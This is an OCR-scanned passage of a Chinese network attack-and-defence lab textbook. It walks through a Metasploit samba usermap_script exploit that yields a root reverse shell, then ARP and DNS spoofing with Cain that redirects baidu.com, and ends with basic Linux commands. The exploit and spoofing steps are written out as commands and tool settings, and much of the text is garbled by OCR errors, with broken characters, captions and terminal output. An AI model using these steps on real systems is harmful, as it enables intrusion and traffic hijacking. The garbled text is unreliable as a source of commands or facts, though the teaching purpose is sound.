inet6 addr: — 6eB0: 1eff: fed4, 62c4/ 64 Scope: Link 

UP BROADCAST RUNNING MULTICAST MTU: 1500 . Metric: 1 

RX packets: 195939 errors:0 dropped:O overruns;0 frame; 0 

TX packets: 3213 errors: 0 dropped: 0 overruns; 0 carrier: 0 


collisions; 0 txqueuelen: 1000 
RX bytes: 12193274 (11. 6 MiB) TX bytes: 554421 (541.4 KiB) 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask; 255.0.0.0 
inet6 addr; ::1/128 Scope: Host 

UP LOOPBACK RUNNING MTU; 65536 MMetric:1 


图 2-74 查看 攻击 机 的 IP 地 址 


Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro -- learn more on http: // rapid7.com/metasploit 


=[ metasploit v4, 9,3-2014071601 [core:4.9 api: 1. 0]. ] 
图 2-75 运行 Metasploit F 853 ^msfconsole" $5 & 


步骤 4: 搜索 samba 漏洞 利用 搬 件 ,可 输入 “search samba" mS . lk 2-76 所 示 。 


msf >| search samba 


Matching Modules 


Disclosure Date 


auxiliary/admin/smb/samba s normal 
amba Symlink Directory tanbo. IN 
a Smink Directory rave ia PL normal 


amba lsa io privilege set Heap Overflow Ï 
auxiliary/dos/samba/ lsa_ t ransnames, heap normal 


2-76 ”搜索 samba 漏洞 利用 插件 


步骤 5: 通过 “use exploit/multi/samba/usermap_script” 命 令 加 载 samba ihi ih] A) FH di 


> use exploit/multi/samba/Usermap script 
exploit( usermap_script 


msf 
msf 


图 2-77 Wm samba 漏洞 利用 插件 
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步骤 6: 输入 “info” 命 令 ,查看 samba 模块 信息 ,如 图 2-78 所 示 。 


msf exploit(usermap script) >[info ] 


Name; Samba "username map script" Command Execution 
Module; exploit/multi/samba/usermap. script 
Platform Unix 
Privileged: Yes 
License; Metasploit Framework License (BSD) 
Rank; Excellent 


】 
Provided by: 
jduck «jduckGnetasploit. com» 


—— WALD LINON 


Id Name 


0 Automatic 


图 2-78 ”查看 samba 模块 信息 


~ 


J 参数 ,如 图 2-79 所 示 。 


步骤 7: 输入 “show options” 命 令 ,查看 需要 设置 上 


msf exploit(usermap script) > 


Module options (exploit/multi/samba/usermap, script): 
Name Current Setting Required Description 


The target address 
The target port 


Exploit target EDPIDUNUX 


Id Name 


0 Automatic 


图 2-79 查看 需要 设置 的 参数 
步骤 8: 通过 “set rhost” mA ix & BLA IP 地 址 ,如 图 2-80 所 示 。 


msf exploit(usermap script) »|[set RHOST 172. 16. 1.35 


RHOST => 172. 16. 1.35 


图 2-80 ”设置 技 机 的 IP 地 址 
步骤 9: 输入 “exploit” 命 令 , 对 靶 机 执行 溢出 操作 ,如 图 2-81 所 示 。 


exploit(usermap script) » [exptoit ] 


Started reverse double handler 

Accepted the first client connection... 
Accepted the second client connection... 
Command: echo sFl55sVJErT7tAIm 

Writing to socket A 

Writing to socket B 


Reading from sockets... 
Reading from socket B 
B: "sFi55sVJErT7tAIm V rin" 


is input... CALU LURNUA 


Command shell session 1 opened ( 172. 16. 1. 29: 4444 -> 172.16.1.35: 34114) at 20 


-09 04:52:01 -0500 I 


图 2-81 对 靶 机 执行 溢出 操作 
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步骤 10: 输入 “whoami” 命 令 , 显 示 登 录 名 (为 攻击 机 使 用 的 用 户 账户 名 root) ,如 图 2-82 
所 示 。 


whoami 
root 


图 2-82 显示 登录 名 


2.8.4 任务 与 思 


-个 完整 的 漏洞 扫描 器 一 般 由 以 下 几 部 分 组 成 。 

1. 漏洞 数据 库 

漏洞 数据 库 包括 漏洞 的 具体 信息 ,漏洞 扫描 评估 脚本 .安全 漏洞 危害 评分 等 信息 ,该 漏 
洞 数据 库 会 在 新 的 漏洞 被 公布 后 及 时 更 新 。 漏 洞 数 据 库 一 般 需 要 与 CVE 保持 兼容 。 

2. 扫描 引擎 模块 

扫描 引擎 模块 是 漏洞 扫描 器 的 核心 部 件 , 它 一 般 提供 了 一 个 可 供用 户 操 作 的 控制 台 。 
通过 控制 台 , 用 户 可 以 定义 被 扫描 对 象 并 设置 相关 参数 ,对 被 扫描 对 象 发 送 扫 描 用 探测 数据 
包 , 并 从 接收 到 的 被 扫 摘 对 象 返回 的 应 答 数据 包 中 提取 漏洞 信息 ,然后 与 漏洞 数据 库 中 的 漏 
洞 特 征 进行 比 对 ,以 判断 目标 对 象 是 否 存 在 漏洞 。 一 般 的 扫描 器 同时 提供 了 主机 扫描 、 端 口 
扫描 、 操 作 系 统 扫 描 和 网 络 服务 探测 等 功能 。 

3. APH gA 

用 户 控制 台 用 于 对 扫描 对 象 和 方式 进行 设置 ,如 要 扫描 的 目标 主机 及 要 检测 的 具体 漏 
洞 等 。 

4. 扫描 进程 控制 模块 

扫描 进程 控制 模块 用 于 监控 扫描 进程 的 任务 进展 情况 ,并 将 当前 扫描 的 进度 和 结果 信 
息 通 过 用 户 控 制 台 展示 给 用 户 。 

S. 结果 存储 与 报告 生成 模块 

结果 存储 与 报告 生成 模块 利用 漏洞 扫描 得 到 的 结果 自动 生成 扫描 报告 ,并 告知 用 户 在 
哪些 目标 系统 上 发 现 了 哪些 安全 漏洞 。 


2.9 ARP 和 DNS 欺骗 攻击 的 实现 


2.9.1 预备 知识 : ARP 和 DNS 欺骗 原理 


1. ARP 欺骗 

ARP( Address Resolution Protocol, 地 址 解析 协议 ) 其 骗 是 攻击 者 和 常用 的 网 络 攻击 手 
段 之 一 。ARP 协议 涉及 TCP/IP 体系 结构 中 网 络 层 的 IP 地 址 和 数据 链 路 层 的 MAC 地 
址 , 即 根据 IP 地 址 来 查询 对 应 的 MAC 地 址 。 对 于 具体 的 网 络 节 点 来 说 ,其 IP 地 址 和 
MAC 地 址 之 间 存 在 一 一 对 应 关系 。ARP 欺骗 的 实质 就 是 破坏 P 地 址 与 MAC 地 址 之 间 
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的 一 一 对 应 关系 ,将 虚假 的 对 应 关系 提供 给 其 他 节点 ,使 被 欺骗 节点 将 数据 错误 地 发 送 
给 欺骗 节点 。 

ARP 欺骗 的 类 型 较 多 ,最 典型 的 是 伪造 网 关 。 网 关 是 一 个 网 络 ( 一 般 为 一 个 IP 网 段 或 
一 个 局 域 网 ) 向 外 部 发 送 并 从 外 部 接收 数据 的 节点 ,对 于 网 络 中 的 主机 来 说 ,如 果 指 定 的 网 
关 有 错 , 将 无 法 正常 与 外 部 进行 通信 。 读 者 可 以 利用 身边 的 计算 机 做 一 个 简单 的 实验 ， 
将 一 台 能 够 正常 连接 互联 网 的 计算 机 的 “默认 网 关 ” 的 IP 地址 修改 为 其 他 任意 一 个 地 

址 ,就 会 发 现 这 台 计 算 机 无 法 正常 接 人 互联 网 了 。 这 一 个 简单 的 实验 充分 说 明了 网 关 的 
-— 

每 个 网 络 节 点 都 维护 着 一 张 ARP 表 , 该 表 中 临时 保存 着 所 有 与 该 节点 建立 通信 关系 
的 其 他 节点 的 IP 地 址 和 MAC 地 址 的 映射 关系 。ARP 表 的 建立 一 般 有 主动 解析 和 被 动 请 
求 两 个 途径 。 

(OD 主动 解析 。 如 果 一 台 计 算 机 和 希望 与 男 外 一 台 不 知道 MAC 地 址 (但 知道 IP 地 址 ) 的 
计算 机 通信 , 则 该 计算 机 主动 发 送 一 个 ARP 请 求 报 文 , 当 对 方 接 收 到 该 ARP 请 求 报 文 后 ， 
就 会 向 请 求 者 返回 一 个 ARP 应 答 报 文 , 通 过 该 应 答 报 文 将 自己 的 MAC 地 址 告诉 给 请 求 
者 。 请 求 者 在 接收 到 应 答 报 文 后 ,就 会 将 对 方 的 IP 地 址 及 MAC 地 址 的 映射 关系 保存 在 自 
己 的 ARP 表 中 。 主 动 解析 实现 的 前 提 是 两 台 计 算 机 必须 位 于 同一 个 IP 子 网 中 。 

(2) 被 动 请 求 。 如 果 一 台 计 算 机 接收 到 了 另 一 台 计 算 机 的 ARP 应 答 ( 广 播 ) 报 文 后 ,不 

管 是 否 需 要 与 该 计算 机 进行 通信 ,都 会 将 该 ARP 应 答 报 文中 计算 机 的 IP 地 址 和 MAC 地 
址 映射 关系 保存 在 自己 的 ARP 表 中 。 

在 掌握 了 有 关 ARP 协议 的 工作 原理 后 ,下 面 通 过 一 个 具体 的 例子 来 介绍 ARP. 欺骗 的 
实现 过 程 。 

假设 有 3 台 计 算 机 A, B.C. HF B 已 经 正确 建立 了 A 和 C 计算 机 的 ARP 表 项 。 假 设 
A 是 攻击 者 ,此 时 A 发 出 一 个 ARP 应 答 报 文 ,该 ARP 应 答 报 文 的 构造 为 : IP 地 址 是 C 的 
IP 地 址 ,MAC 地 址 是 A 的 MAC 地 址 。 

这 样 ,计算 机 B 在 收 到 这 个 ARP 应 答 报 文 (ARP 应 答 报 文 是 一 个 广播 报 文 ,同一 网 络 
上 所 有 计算 机 都 能 收 到 ) 时 ,发 现 自己 的 ARP 表 中 已 经 存在 计算 机 C 的 IP 地址 和 MAC 地 
址 的 映射 ,但 MAC 地 址 与 收 到 的 应 答 报 文中 的 MAC 地 址 不 一 致 ,于 是 根据 ARP 协议 , 计 
算 机 B 将 使 用 ARP 应 答 报 文中 的 MAC 地 址 (其 实 是 计算 机 C 的 MAC 地址) 更 新 自己 的 
ARP X. 

通过 以 上 过 程 ,计算 机 也 的 ARP 绥 存 中 就 存在 了 错误 ARP XXn. 计算 机 C 的 IP 地 址 
与 计算 机 A Bj MAC 地 址 对 应 。 这 样 的 结果 是 ,计算 机 B 发 给 C 的 数据 都 被 计算 机 A 接收 
到 ,从 而 实现 了 ARP 欺骗 。 

2. DNS 欺骗 


DNSCDomain Name System ,域名 系统 ) 的 作用 是 在 用 户 访 问 互 联网 时 将 从 浏览 硕 的 地 
址 栏 中 输入 的 域名 (如 www. sina. com. cn) 解 析 为 对 应 的 IP 地 址 (如 202. 102. 94. 124) 。 对 
于 任何 一 台 接 和 人 互联 网 的 主机 来 说 ,在 DNS 的 缓存 还 没有 过 期 之 前 ,如 果 在 DNS 的 缓存 中 
EAETEEIIDR EC PMGAD DS 服务 需 将 会 直接 返回 缓存 中 的 记录 。 否 则 ,DNS 
将 进行 递归 查询 。 

下 面 通过 一 个 具体 例子 来 介绍 DNS 欺骗 的 实施 过 程 。 
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一 台 运 行 着 UNIX 系统 的 Internet 主机 ,在 该 主机 上 提供 了 rlogin Cie f£ X& 550 HR 49 ,该 
主机 的 IP 地 址 为 123. 45. 67. 89 ,使 用 的 DNS 服务 器 ( 即 /etc/resolv. conf 中 指向 的 DNS 服 
25 a8) HJ IP 地 址 为 98.76. 54. 32。 某 个 客户 端 (IP 地 址 为 38. 222. 74. 2) 试 图 连接 到 UNIX 
主机 的 rlogin 端口 ,假设 UNIX 主机 的 /etc/hosts. equiv 文件 中 使 用 的 是 DNS 名 称 来 允许 
目标 主机 的 访问 ,那么 UNIX 即 会 向 IP 为 98. 76. 54. 32 的 DNS 服务 器 发 出 一 个 PTR( 反 
问 解 析 ) 记 录 的 查询 。 


123.45.67.89 一 > 98.76.54.32 [Query] 
NQY: 1 NAN: 0 NNS: 0 NAD: 0 
QY: 2.74.222.38. in - addr. arpa FTR 


IP 地 址 为 98. 76. 54. 32 的 DNS RS AP 7 3x 1 Jc [8] c 18] Je H3) fri e. » Z6 3E — 38 x HJ. 
这 个 DNS 服务 器 找到 38. 222. 74. 2 和 38. 222. 74. 10 为 74. 222. 38. in-addr. arpa. 的 权威 
DNS 服务 器 ,所 以 它 会 向 38. 222. 74. 2 发 出 PTR 查询 。 


98.76.54.32 -> 38.222.774. 2 [Query] 
NQY: 1 NAN: 0 NNS: 0 NAD: 0 
QY: 2.74.222.38. in - addr. arpa FIR 


需要 注意 的 是 ,38. 222.74. 2 正 是 本 例 中 客户 端的 IP 地 址 ,也 就 是 说 这 台 主 机 是 完全 
掌握 在 攻击 者 手中 的 。 攻 击 者 可 以 更 改 它 的 DNS 记录 ,让 它 返 回 所 需要 的 结果 。 


38.222.74.2 ->98.76.54.32 [Answer] 

NOY: 1 NAN: 2 NNS: 2 NAD: 2 

QY: 2.74.222.38. in- addr. arpa PTR 

AN: 2.74.222.38. in- addr. arpa PTR trusted. host. com 
AN: trusted. host. com A 38.222. 74.2 

NS: 74.222.38. in- addr. arpa NS ns. sventech. com 

NS: 74.222.38. in- addr. arpa NS ns1. sventech. com 
AD: ns. sventech. com A 38.222. 74.2 

AD: nsl.sventech. com A 38.222. 74.10 


当 IP 地 址 为 98.76. 54. 32 的 DNS 服务 器 收 到 这 个 应 答 报 文 后 ,会 把 结果 转发 给 IP 地 
址 为 123. 45. 67. 98 的 主机 , 即 本 例 中 那 台 提供 rlogin 服务 的 UNIX 主机 (攻击 目标 ) ,并 且 
IP 地 址 为 98.76. 54. 32 的 DNS 服务 硕 会 把 这 次 的 查询 结果 保存 在 上 月 己 的 缓存 中 , 供 下 次 
查询 时 使 用 。 

这 时 ,UNIX 主机 就 认为 IP 地 址 为 38. 222. 74. 2 的 主机 名 为 需要 解析 的 域名 (假设 该 
域名 为 trusted. host. com) ,然后 UNIX 主机 查询 本 地 的 /etc/hosts. equiv 文件 ,看 这 台 主 机 
是 否 被 允许 使 用 rlogin 服务 。 很 显然 ,攻击 者 的 欺骗 目的 达到 了 。 


2.9.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 重点 掌握 以 下 知识 。 
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(1) 常见 的 ARP 欺骗 和 DNS 欺骗 原理 及 实现 过 程 。 

(2) 结合 具体 应 用 ,分 析 ARP 欺骗 和 DNS 欺骗 产生 的 原因 ，。 

(3) ARP 欺骗 和 DNS 欺骗 的 防范 方法 。 

2. 实验 条 件 

本 实验 在 一 台 运 行 Windows Server 2003 及 以 上 版 本 的 服务 需 上 进行 。 在 开始 实验 之 
前 ,还 需要 安装 和 配置 Cain 和 Sniffer( 或 Wireshark) 软 件 。 

其 中 ,Cain 是 一 款 可 以 明文 形式 捕获 远程 控制 命令 或 密码 的 工具 , 文 持 多 种 远程 控制 
或 远程 传输 协议 ,提供 的 主要 功能 包括 管理 远程 系统 的 路 由 表 、 显 示 远 程 系 统 上 本 地 端口 的 
状态 、 转 存 远 程 系 统 上 的 LSA(Local Security Authority, 本 地 安全 机 构 ) 的 内 容 、 从 SAM X 
件 中 读 取 NT 的 口令 散 列 值 等 。 

Sniffer 是 一 种 典型 的 监视 网 络 状态 、 数 据 流动 情况 及 网 络 上 传输 信息 的 工具 ,也 是 网 
络 攻防 中 使 用 的 必 备 工具 。 


2.9.3 实验 过 程 


步骤 1; Æ Windows 服务 器 上 安装 Cain 或 Sniffer 等 软件 ,本 实验 中 使 用 的 是 Cain 
工具 。 
步骤 2: 运行 Cain 软件 ,打开 如 图 2-83 所 示 的 操作 窗口 。 


En Yiew pp Tools | S oii 


P D Wireless Passwords 
E- IET Passwords 

pia Findows Mail Passwords 

eM Dialup Pas 

E Edit des 


= Enterprise Manager 
295 Credential Manager 


gj Protected Storage 


dde oxid it | 4 
图 2-83 Cain 软件 操作 窗口 


步骤 3: 选择 Configure 选项 ,在 打开 的 如 图 2-84 所 示 对 话 框 中 对 进行 欺骗 的 IP 地 址 
和 MAC 地 址 进行 配置 。 在 本 实验 中 ,192. 168. 0. 233 为 伪造 的 IP 地 址 。 

步骤 4: Æ Filters and ports 选项 卡 中 ,选择 需要 进行 嗅 探 的 协议 ,如 图 2-85 所 示 。 如 
果 要 对 邮件 收发 进行 嗅 探 , 就 需要 同时 选中 POP3、SMTP、IMAP 复 选 框 。 

步骤 5. 选择 功能 栏 中 的 嗅 探 器 Sniffer, 再 选取 主机 Hosts。 在 扫描 前 需要 先 激活 嗅 探 
25 CH ade 图 标 ) ,如 图 2-86 所 示 。 

步骤 6: 在 图 2-86 中 的 操作 界面 的 空 日 处 右 击 ,在 出 现 的 快捷 亲 单 中 选择 Scan MAC 
Addresses 选项 ,如 图 2-87 所 示 , 即 开始 对 MAC 地 址 进行 扫描 。 扫 描 结果 如 图 2-88 所 示 。 
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2-84 ”配置 进行 欺骗 的 IP 地址 和 MAC 地 址 2-85 ”Filters and ports 选项 卡 


图 2-86 激活 嗅 探 器 


步骤 7: 单 击 操作 界面 下 方 的 区 三 到 图 标 ,再 单 击 上 方 的 辆 图 标 , 将 打开 如 图 2-89 所 
示 的 New ARP Poison Routing 对 话 框 ,在 对 话 框 的 左 侧 列表 中 选取 局 域 网 的 网 关 , 在 对 话 
框 的 右 侧 列表 中 选取 被 欺骗 的 IP 地 址 。 在 本 实验 中 ,172. 17. 135. 2 为 网 关 ,172. 17. 135.6 
为 被 欺骗 地 址 。 

步骤 8: 展开 APR 选项 ,如 图 2-90 所 示 , 选 取 APR-DNS 选项 。 然 后 再 单 击 上 方 的 国 
图 标 , 在 打开 的 如 图 2-91 所 示 的 对 话 框 中 配置 DNS 欺骗 的 域名 和 IP 地 址 。 在 本 实验 中 ， 
将 www. baidu. com 的 访问 欺骗 到 IP 地 址 为 211.71. 233. 40 的 主机 上 。 

步骤 9: 开始 ARP 欺骗 。 这 时 ,在 被 欺骗 主机 (IP 地 址 为 172. 17.135.6) 的 浏览 器 地 址 
栏 中 输入 http://www. baidu. com, 打 开 的 却 不 是 百度 公司 网 站 的 首页 ,而 是 IP 地 址 为 
211. 71. 233. 40 的 主机 (为 某 一 单位 网 络 教 学 综合 平台 ,如 图 2-92 所 示 ) 页 面 ,欺骗 成 功 。 
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2-87 选择 Scan MAC Addresses 进行 扫描 


172.17.135.112 | 448A5BOTOEGA | [ 
172. 17. 135. 122 


172. 17. 135.126  O01AASOF2CO] FUJIAN STAR-NET COMMUNI... | 


图 2-88 显示 扫描 结果 


Wew ARP Poison Routing 


à j Im i | 
172.17.135.126 4  0O0I1AASOF2CO! 
17217.135.122  448A5B070E3D | 
172.17.135.112 448A5BÜ70E GA 


448A5B070380 


; ELA he 


国 172171353 — — 002590D96AF6 | 


2-89 选择 网 关 和 被 欺骗 地 址 
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DNS Spoofer for APR 


DNS Name Requested 
[m baidu.com 


IP address to rewrite in response packets 
| 211 . 71 . 233. 40 Resolve | 


croa 


b^ APR-SSM-1 (0) 
ĝ APR-HTTPS (D) 


2-90 APR 选项 2-91 配置 DNS 欺骗 的 域名 和 IP 地 址 
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图 2-92 欺骗 成 功 后 的 显示 页 面 


2.9.4 任务 与 思考 


本 实验 是 一 个 综合 性 实验 ,主要 针对 计算 机 网 络 中 影响 较 大 的 两 类 欺骗 方式 : ARP. EX 
JI DNS 欺骗 。 这 两 类 欺骗 攻击 能 够 得 以 实现 ,主要 是 基于 ARP 和 DNS 协议 存在 的 缺 
陷 。 由 于 在 网 络 发 展 的 早期 ,在 具体 设计 一 些 协议 时 ,还 没有 考虑 到 类 似 于 今天 的 应 用 ,应 
用 的 局 限 性 导致 了 安全 隐患 的 存在 。 这 种 现象 不 仅仅 出 现在 ARP 和 DNS 两 个 协议 中 , 几 
和 

在 完成 了 本 实验 后 ,请 读者 结合 计算 机 网 络 知识 ,深入 分 析 存 在 ARP. 欺骗 和 DNS EX Jig 
a A DNS ABA EI HS 
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“一 切削 文件 ?是 Linux 的 基本 思想 ,包括 命令 、 便 件 和 软件 设备 .进程 等 ,对 于 操作 系统 
内 核 而 言 都 被 视 为 拥有 各 日 特 性 或 类 型 的 文件 。Linux 是 一 球 免 费 的 操作 系统 ,用 户 可 以 
通过 网 络 或 其 他 途径 免费 获取 ,并 可 以 任意 修改 其 源 代码 。 正 是 由 于 “一 切 浓 文件 ”和 开源 
这 两 大 特点 ,来自 全 世界 的 无 数 程 序 员 参 与 了 Linux 的 修改 、 编 写 工作 ,程序 员 可 以 根据 日 
己 的 兴趣 和 灵感 对 其 进行 修改 和 完善 ,这 让 Linux 吸收 了 无 数 程序 员 的 智慧 ,在 发 展 中 不 断 
壮大 ,已 成 为 目前 在 服务 硕 应 用 领域 占用 率 最 高 的 操作 系统 ,也 被 互联 网 资源 的 提供 者 视 为 
最 安全 可 菲 的 操作 系统 。 不 过 ,“ 安 全 ”这 一 概念 在 互联 网 应 用 中 是 相对 的 , 即 在 互联 网 中 不 存 
在 绝对 的 安全 ,各 类 攻击 行为 在 Linux 系统 中 仍然 存在 ,只 是 攻击 的 方式 和 难度 不 同 而 已 。 


3.1 Linux 基本 命令 的 使 用 
3.1.1 预备 知识 : Linux 的 字符 终端 


Linux 系统 的 字符 终端 窗口 为 用 户 提 供 了 一 个 标准 的 命令 行 接口 ,在 字符 终端 窗口 中 ， 
会 显示 一 个 Shell 提示 符 ,通常 为 "“$”。 用 户 可 以 在 提示 符 后 输入 带 有 选项 和 参数 的 字符 
命令 ,并 能 够 在 终端 窗口 中 看 到 命令 的 运行 结果 ,此 后 ,将 会 出 现 一 个 新 的 提示 符 ,标志 着 新 
命令 行 的 开始 。 字 符 终端 窗口 中 出 现 的 Shell 提示 符 因 用 户 不 同 而 有 所 差异 ,其 中 ,普通 用 
户 的 命令 提示 符 为 *$”, 超 级 管理 员 用 户 的 命令 提示 符 为 “#”, 这 两 个 符号 之 间 所 表示 的 用 
户 身 份 的 差别 ,在 Linux 攻防 中 是 非常 重要 的 。 因 为 在 Linux 用 户 的 提 权 攻击 过 程 中 , 当 同 
一 用 户 账 户 在 不 同时 间 段 登录 系统 后 ,如 果 在 字符 终端 窗口 中 提示 符 从 “$” 变 为 “#”, 说 明 
提 权 操作 成 功 。 

Linux 系统 中 的 命令 是 区 分 大 小 写 的 。 在 Linux 命令 行 中 ,可 以 使 用 Tab 键 来 自动 补 
齐 命 令 , 即 可 以 只 输入 命令 的 前 几 个 字母 ,然后 按 Tab 键 ,系统 将 自动 补 齐 该 命令 ; 如 果 命 
令 不 止 一 个 , 则 显示 所 有 和 输入 字符 相 匹 配 的 命令 。 按 Tab 键 时 ,如 果 系 统 只 找到 一 个 和 
输入 字符 相 匹 配 的 目录 或 文件 , 则 月 动 补 齐 ; 如 果 没 有 匹配 的 内 容 或 有 多 个 相 匹 配 的 名 称 ， 
系统 将 发 出 警 鸣 声 ,再 按 一 下 Tab 键 将 列 出 所 有 相 匹 配 的 内 容 , 以 供用 户 利 用 向 上 或 向 下 
的 光标 键 来 选择 。 

Linux 可 以 翻 查 曾经 执行 过 的 历史 命令 。 如 果 要 在 一 个 命令 行 上 输入 和 执行 多 条 命 
令 , 可 以 使 用 分 号 来 分 隔 命令 ,如 "cd /;1s"; 如 果 要 使 程序 以 后 台 方 式 执 行 , 只 需 在 要 执行 
的 命令 后 跟 上 一 个 “&.” 符 号 即 可 。 


3.1.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 掌握 以 下 内 容 。 


90 网 络 攻 击 与 防御 实 训 


(D) Linux 命令 行 的 操作 方法 。 

(2) 文件 目录 类 命令 的 使 用 方法 。 

(3) 系统 信息 类 命令 的 使 用 方法 。 

(4) 进程 管理 类 命令 的 使 用 方法 。 

2. 实验 条 件 

本 实验 需要 在 一 台 运 行 Linux 操作 系统 的 计算 机 上 完成 ,这 人 台 计 算 机 既 可 以 是 一 台 物 
理 机 ,也 可 以 是 一 台 虚 拟 机 (在 实验 中 ,如 果 没 有 特殊 要 求 , 建 议 使 用 虚拟 机 )。 本 实验 使 用 
的 Linux 操作 系统 为 Red Hat。 


3.1.3 实验 过 程 


步骤 1: 进入 实验 用 的 Red Hat 操作 系统 后 ,在 命令 行 终 端 窗口 中 可 以 输入 俐 单 的 命 
A ,如 图 3-1 所 示 。 


Red Hat Enterprise Linux Server release 5.4 (Tikanga) 
Kernel 2.6.18-164.615 on an i686 


loudlab login: root 


Password: 
Last login: Med Oct 31 82:28:49 on ttuy1 
[root8cloudlab ~]# _ 


图 3-1 Linux 的 字符 操作 界面 


革命 令 行 中 , 先 来 熟悉 一 些 简 单 的 命令 ,并 了 解 这 些 命令 的 用 途 。 其 中 ,浏览 目录 类 命 
令 主 要 包括 pwd、cd.\1s, 浏 览 文件 类 命令 主要 包括 kre Jess head til, 目录 操作 类 命 
令 主 要 包括 mkdir rmdir ,文件 操作 类 命令 主要 包括 cd rm diff tar, mv, whereis,grep., 

步骤 2: 在 图 3-2 中 ,开始 演示 浏览 目录 类 命令 pwd.cd.ls 的 使 用 。 其 中 ,“]s -la / 
home/ ”命令 为 列 出 home H 5 P & E Eso X PF TE VJ " 所 有 文件 。 其 他 浏览 目录 类 命令 看 
望 谈 者 目 己 动手 进行 练习 。 


ls -la /home/ 


root 4896 Oct 31 B2:21 
root 4896 Jan 7 86:38 
test 4896 Oct 31 B2:21 


[rontüc loud lab EE 


图 3-2 浏览 目录 


步骤 3: 在 图 3-3 中 ,开始 演示 浏览 文件 类 命令 cat, more, less, head, tail 的 使 用 。 


[rootBcloudlab "18 tail -3 /etc/passwd 
sabayon:x:86:86:Sabayon user:/home^7sabayon:^/sbin^znologin 
pegasus:x:66:65:tog-pegasus ÜpenPegasus WBEM/^CIM seruices:^7var^/lib^/Pegasus:^/sbin 


: :/home^;test:^/bin^;bash 
[root8cloudlab ^18 — 


图 3-3 浏览 文件 
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步骤 4: 在 图 3-4 中 ,开始 演示 目录 操作 类 命令 mkdir,rmdir 的 使 用 。 


[rooticloudlab "18 mkdir /home^;chen 
[rootBcloudlab ~ ]# 11 “homey/ 

otal 16 

ruxr-xr-x 2 root root 4896 Jan 7 86:41 


3 test test 4896 Oct 31 82:21 
[root8c loud lab TM. 


图 3-4 目录 操作 
步骤 5: 在 图 3-5 中 ,开始 演示 文件 操作 类 命令 cd rm diff tar, mv, whereis grep 的 使 用 。 


[rootgcloudlab J]# grep root /etc/passwd 
00t:x:B8:B8:root:/root:^/bin^;bash 
perator:x:11:8:operator:/root:^/sbin^znologin 


[rootBcloudlab ^14 . 


图 3-5 文件 操作 


在 Linux 操作 系统 中 ,还 有 以 下 一 些 稼 用 的 命令 。 
dmesg: 显示 系统 诊断 信息 、 操 作 系 统 版 本 号 、 物 理 内 存 大 小 及 其 他 信息 。 
df; 查看 文件 系统 的 各 个 分 区 占用 情况 。 

du: 查看 某 个 目录 中 的 各 级 子 目 录 使 用 便 盘 空间 数 。 
free: 查看 系统 内 存 、 虚拟 内 存 的 大 小 及 占用 情况 。 
date; 查看 和 设置 当前 日 期 和 时 间 。 

cal: 显示 指定 月 份 或 年 份 的 日 历 。 

clock: 显示 系统 时 钟 。 

ps: 查看 系统 进程 。 

kill: 回 进 程 发 送 强 制 终 止 信号 。 

killall; 根据 进程 名 发 送 终止 信号 。 

nice: 指定 运行 程序 优先 级 。 

renice: 根据 进程 的 进程 号 来 改变 进程 的 优先 级 。 
top: 实时 监控 进程 状态 。 

bg.jobs.fg: 控制 进程 显示 。 


3.1.4 任务 与 思考 


考虑 到 部 分 读者 对 Linux 操作 系统 的 命令 行 操 作 不 熟悉 ,本 实验 主要 通过 对 常用 命令 
的 学 习 ,使 读者 逐渐 熟悉 Linux 的 操作 环境 ,并 初步 掌握 一 些 和 常用 命令 的 功能 和 使 用 方法 。 


Linux 在 服务 硕 应 用 中 占有 绝对 的 优势 ,目前 DNS.DHCP、NATI 等 大 量 的 互联 网 基础 
息 服 务 都 构建 在 Linux 操作 系统 之 上 ,同时 Web, E-mail, FTP 等 服务 平台 也 主要 选择 
Linux 操作 系统 。 对 于 网 络 攻防 的 学 习 来 说 ,读者 必须 通过 系统 学 习 来 掌握 Linux 操作 系 
统 的 相关 操作 ,同时 对 Linux 的 工作 机 制 有 一 个 全 面 深 入 的 认识 。 其 中 包括 Linux 操作 系 
统 在 进程 与 线程 管理 内存 管理 .系统 管理 .设备 控制 、 网 络 . 系统 调用 等 方面 形成 的 特有 工 


作 机 制 ,掌握 这 些 工 作 机 制 为 全 面 学 习 Linux 操作 系统 的 功能 及 应 用 特点 是 非常 有 帮助 的 。 
请 谱 者 依 助 各 类 工具 ,通过 查阅 相关 文献 ,并 进行 实验 操作 ,来 掌握 与 Linux 工作 机 制 


相关 的 内 容 。 
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3.2 Linux 用 户 和 组 的 管理 


3.2.1 预备 知识 : Linux 用 户 和 组 的 管理 特点 


Linux 操作 系统 是 一 个 多 用 户 ,多 任务 的 操作 系统 ,允许 多 个 用 户 同时 登录 到 同一 个 系 
统 , 使 用 系统 资源 。 为 了 使 所 有 用 户 的 工作 顺利 进行 ,保护 每 个 用 户 的 文件 和 进程 ,规范 每 
个 用 户 的 权限 ,再 要 区 分 不 同 的 用 户 , 因 此 产生 了 用 户 账户 和 组 群 。 

用 户 账户 是 用 户 的 身份 标识 ,用 户 通过 用 户 账户 可 以 登录 到 系统 ,并 且 访 问 已 经 被 授权 


工作 环境 ,使 每 个 用 户 的 工作 都 能 各 日 独立 不 受 干扰 地 进行 。 

Linux 系统 下 的 用 户 账 户 分 为 普通 用 户 账 户 和 超级 用 户 账户 (root) 两 种 类 型 。 其 中 ， 
超级 用 户 账户 又 称 为 根 用 户 或 管理 员 账 户 , 可 以 对 普通 用 户 和 整个 系统 进行 管理 。Linux 
系统 下 的 账户 管理 具有 以 下 特点 。 

(1) 组 群 也 称 为 工作 组 ,是 具有 相同 特性 的 用 户 的 人 逻辑 集合 ,使 用 组 群 有 利于 系统 管理 
员 按 照 用 户 的 特性 组 织 和 管理 用 户 ,提高 工作 效率 。 

(2) 在 为 资源 授权 时 可 以 把 权限 赋予 某 个 组 群 ,组 群 中 的 成 员 即 可 自动 获得 这 种 权限 。 

(3) 一 个 用 户 账 户 至 少 属于 一 个 用 户 组 , 当 某 一 用 户 账 户 属于 多 个 组 群 的 成 员 时 ,其 中 
某 个 组 群 是 该 用 户 的 主 组 群 (私有 组 群 ) ,其 他 组 群 是 该 用 户 的 附属 组 群 (标准 组 群 )。 

(4) 每 一 个 用 户 和 都 有 一 个 唯一 的 身份 标识 , 称 为 用 户 ID(UID); 每 一 个 用 户 组 也 有 一 
个 唯一 的 身份 标识 , 称 为 用 户 组 ID(GID)。 其 中 ,root 用 户 的 UID 为 0。 

